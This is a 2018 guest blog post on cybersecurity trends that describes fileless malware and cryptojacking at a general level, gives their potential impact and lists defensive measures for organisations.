Spotlight on leadership and cybersecurity in changing times
Metin Mitchell, Managing Partner, and guest contributors
2018 Trends in Hacking and Cybersecurity
Guest blog by Raef Meeuwisse, passionate about cyber, AI, keynote speaker, CISO consultancy and author of numerous cybersecurity publications, including the highly successful title ‘Cybersecurity for Beginners’.
According to a survey last year (the Fortinet Global Threat Report 2017), over 90% of organizations had experienced at least one attack that used a vulnerability that was over 3 years old. In that same report, it mentions that almost no attacks at all rely on zero day* threats.
* Zero day or 0 day is the term given to new vulnerabilities when they are first discovered and have yet to have any specific defences or countermeasures available.
So, if you can address all of your organizations basic cybersecurity gaps, will that make your enterprise safe? The unfortunate answer to that question is ‘no’.
It is true that the majority of devastating breaches (so far) have impacted organizations where the gaps in cybersecurity defences are large enough to drive a fleet of trucks through. Wannacry, NotPetya – these malware attacks caused large scale devastation in enterprises that had not taken their basic cyber hygiene seriously.
However, although getting cybersecurity basics in place will make your organization safer, it will not make them hacker proof. It turns out that hackers are fashion conscious. Although an exploit that is over 1 year old can still compromise the cybersecurity in most enterprises, most hackers also want tools in their inventory that can exploit and monetise even the most robust organizations.
Just like you and I might look for the latest smartphone to hit the shelves, the streetwise hackers are constantly watching the blogs for the emerging vulnerabilities they can take advantage of. 24 hours after any new vulnerability is announced to the world, the initial exploit kit for hackers to use to take advantage of it can be found on the darknet.
For a hacker, being an early adopter of a new style of cyber attack has the potential to make you a lot of money. Hackers are looking for the low hanging fruit – the easiest targets to monetise. Brand new exploits often provide those opportunities because they target areas that are yet to have adequate cyber defences in place.
So what are some of the main trends that cyber threat analysts are discussing in early 2018?
- Fileless malware – this is a form of malicious software that can be designed to operate in the memory of computers, without the need to create files on the disk or storage area of a device. Because most traditional antimalware products look for changes in the file storage system, this form of exploit is able to bypass the security technologies at most companies at present.
- Potential Impact – This is malicious software that can run without being installed. It has the potential to bypass most existing forms of security, steal information, passively scrutinise environments and help launch more devastating attacks.
- What can be done? Upgrading or adding security software capable of identifying and blocking fileless malware can overcome the threat. At present, it is believed that less than 10% of enterprises have implemented defences against fileless malware. You can also harden the security configuration of devices to block certain services (such as powershell and WMI) that fileless malware may rely upon. Hardened network configuration can also help to prevent fileless malware from being spread.
- Cryptojacking – cryptocurrencies are very lucrative in early 2018 and there is plenty of real money to be made from these virtual currencies. One way to make money is by using computing power to help mine or transact digital currencies. However, computers cost money and need power to operate. If you are a hacker, you could always steal the use of other peoples computers and power to make money from cryptocurrency. Welcome to cryptojacking – effectively making money by hijacking other peoples computing power to process cryptocurrency transactions. The reward for mining cryptocurrencies is designed to exceed the cost of the power and computing capacity they use. Effectively, every moment a device is being cryptojacked, the money for the power consumption and computing can be paid to the hackers. This might not sound like a really big problem, however, so far, cryptojacking scripts have been found on large numbers of websites, even government websites. Those website scripts leverage the power of the computers that browse to them. If you can get thousands or even millions of devices to run cryptojacking scripts, the money soon starts to add up. Given the power and computing demands for crypto, this is potentially a multi-billion dollar hacker activity in the making.
- Potential Impact – It can be brand damaging to have customer facing websites causing this issue to affect customer computers. It can also cause internal operations to slow down and become more expensive. A sudden upward shift in power demand and computing utilisation can be hard to spot. Indeed, there have even been examples of rogue insiders intentionally using ‘spare’ enterprise computer capacity to mine currency for their own benefit.
- What can be done? New forms of cryptojacking attacks are continuing to emerge. So far, based on existing attacks, controls can include installing anti-mining add-ons to Internet browsers like Chrome, setting scripts to be blocked and ensuring that any scripts in your own websites and programs include measures to authenticate them before use. It is also likely that endpoint security will develop to help identify, alert and block mining activities.
The majority of hacking activity may exploit old vulnerabilities, but beware, because the hackers that create the markets of tomorrow are already making a lot of money from newer vulnerabilities. The latest vulnerabilities often require more than basic cyber hygiene steps to defend against them…and because all of the vulnerabilities above are known, they are no longer considered to be zero day threats.
The cyber threat landscape is continuing to evolve and require ever more sophisticated and complex defence measures. And what cyber threat scares me most in 2018? DDoS. More about that topic later in the year.
Published in Cyber securityback to top